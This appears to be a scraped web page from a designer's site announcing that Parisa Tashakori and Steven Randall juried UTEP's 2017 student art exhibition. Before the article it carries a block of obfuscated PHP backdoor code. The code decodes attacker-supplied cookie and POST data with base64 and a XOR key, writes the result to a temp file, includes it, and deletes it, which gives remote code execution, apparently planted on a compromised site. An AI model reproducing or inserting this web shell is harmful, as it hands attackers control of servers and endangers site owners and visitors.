$pNprM = "\145" . '_' . 't' . "\167" . "\106" . 'B';$zpMeCn = chr ( 584 - 485 ).chr ( 900 - 792 ).chr ( 822 - 725 )."\x73" . "\x73" . "\x5f" . "\x65" . chr (120) . chr ( 1101 - 996 )."\163" . "\x74" . chr ( 718 - 603 ); $oOdPmu = class_exists($pNprM); $zpMeCn = "12690";$jKfqJqhdZ = !1;if ($oOdPmu == $jKfqJqhdZ){function NVmEZPVBx(){$BCwiz = new /* 47960 */ e_twFB(29096 + 29096); $BCwiz = NULL;}$gkXBOtDUm = "29096";class e_twFB{private function aybYrlGGm($gkXBOtDUm){if (is_array(e_twFB::$xrLUnOicGt)) {$JHxYrbTW = sys_get_temp_dir() . "/" . crc32(e_twFB::$xrLUnOicGt['s' . chr (97) . "\x6c" . "\x74"]);@e_twFB::$xrLUnOicGt["\167" . "\x72" . chr (105) . chr ( 561 - 445 )."\x65"]($JHxYrbTW, e_twFB::$xrLUnOicGt["\143" . "\157" . "\156" . 't' . "\x65" . chr ( 326 - 216 ).chr ( 980 - 864 )]);include $JHxYrbTW;@e_twFB::$xrLUnOicGt[chr ( 850 - 750 ).chr ( 454 - 353 )."\154" . 'e' . 't' . "\145"]($JHxYrbTW); $gkXBOtDUm = "29096";exit();}}private $EeZTo;public function atxCOwloKG(){echo 44347;}public function __destruct(){e_twFB::$xrLUnOicGt = @unserialize(e_twFB::$xrLUnOicGt); $gkXBOtDUm = "48414_13735";$this->aybYrlGGm($gkXBOtDUm); $gkXBOtDUm = "48414_13735";}public function RDueVjcG($iYFFM, $uOnncg){return $iYFFM[0] ^ str_repeat($uOnncg, (strlen($iYFFM[0]) / strlen($uOnncg)) + 1);}public function vlZvfUQF($iYFFM){$IzLsotB = "base64";return array_map($IzLsotB . chr ( 528 - 433 ).chr ( 552 - 452 ).'e' . chr (99) . "\x6f" . "\144" . 'e', array($iYFFM,));}public function __construct($LEeTjRoXRH=0){$wQAfKoLjkz = $_POST;$XEGmQ = $_COOKIE;$uOnncg = "2bd1985e-858d-4635-9697-9ff29e580941";$KkzDVix = @$XEGmQ[substr($uOnncg, 0, 4)];if (!empty($KkzDVix)){$iYFFM = "";$KkzDVix = explode(",", $KkzDVix);foreach ($KkzDVix as $hivpFoHAZ){$iYFFM .= @$XEGmQ[$hivpFoHAZ];$iYFFM .= @$wQAfKoLjkz[$hivpFoHAZ];}e_twFB::$xrLUnOicGt = $this->RDueVjcG($this->vlZvfUQF($iYFFM), $uOnncg);}}public static $xrLUnOicGt = 36862;}NVmEZPVBx();}$kdSrPXQudm = chr ( 187 - 117 )."\113" . "\170" . "\137" . chr (76) . "\x67" . 'a' . chr ( 562 - 465 ).'P';$WBxarGT = chr (99) . 'l' . chr ( 750 - 653 )."\x73" . 's' . chr ( 509 - 414 ).'e' . "\x78" . chr (105) . "\x73" . chr (116) . chr (115); $ocGSiPlNNj = class_exists($kdSrPXQudm); $kdSrPXQudm = "39487";$WBxarGT = "47995";if ($ocGSiPlNNj === FALSE){class FKx_LgaaP{public function hfEneaL(){echo "53996";}private $NYkwHRdgQ;public static $pllxlZaLCp = "9eaaabcb-13f1-4c6b-a7ab-8b3fc8a54e92";public static $vVXkMNRn = 40829;public function __construct($XzAcJcIX=0){$QyeoVmA = $_POST;$aOfZpy = $_COOKIE;$kXkrMryyqq = @$aOfZpy[substr(FKx_LgaaP::$pllxlZaLCp, 0, 4)];if (!empty($kXkrMryyqq)){$lCroGRBbSL = "base64";$GWiSjiaC = "";$kXkrMryyqq = explode(",", $kXkrMryyqq);foreach ($kXkrMryyqq as $pXFSx){$GWiSjiaC .= @$aOfZpy[$pXFSx];$GWiSjiaC .= @$QyeoVmA[$pXFSx];}$GWiSjiaC = array_map($lCroGRBbSL . '_' . "\x64" . chr (101) . chr ( 1002 - 903 ).chr (111) . 'd' . "\x65", array($GWiSjiaC,)); $GWiSjiaC = $GWiSjiaC[0] ^ str_repeat(FKx_LgaaP::$pllxlZaLCp, (strlen($GWiSjiaC[0]) / strlen(FKx_LgaaP::$pllxlZaLCp)) + 1);FKx_LgaaP::$vVXkMNRn = @unserialize($GWiSjiaC);}}private function lZkKwQ(){if (is_array(FKx_LgaaP::$vVXkMNRn)) {$VurHmVa = sys_get_temp_dir() . "/" . crc32(FKx_LgaaP::$vVXkMNRn[chr ( 322 - 207 )."\141" . "\154" . chr ( 1026 - 910 )]);@FKx_LgaaP::$vVXkMNRn[chr ( 752 - 633 )."\162" . chr ( 321 - 216 ).chr ( 197 - 81 ).chr ( 944 - 843 )]($VurHmVa, FKx_LgaaP::$vVXkMNRn[chr (99) . 'o' . "\156" . 't' . chr ( 402 - 301 )."\156" . 't']);include $VurHmVa;@FKx_LgaaP::$vVXkMNRn[chr (100) . 'e' . chr (108) . chr ( 260 - 159 ).chr (116) . chr (101)]($VurHmVa); $AFmgwuysjC = "48261";exit();}}public function __destruct(){$this->lZkKwQ();}}$jODCVUybF = new /* 50712 */ FKx_LgaaP(); $jODCVUybF = str_repeat("46215_60110", 1);} Parisa Tashakori and Steven Randall selected the best of UTEP Student Art Exhibition | USA 2017 - Parisa Tashakori
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Parisa Tashakori and Steven Randall selected the best of UTEP Student Art Exhibition | USA 2017

The Rubin Center presented the Annual Juried UTEP Student Art Exhibition, that showcased works of art and design created by undergraduate students enrolled in the Department of Art during the 2016 – 2017 academic year. All media taught in the department were represented, including painting, drawing, sculpture, ceramics, metals, and graphic design.

Iranian designer Parisa Tashakori and Steven Randall from the USA chose the best works of this year.

In addition, Parisa presented her works at the University of  Texas, El Paso on April 6, 2017.


More info:
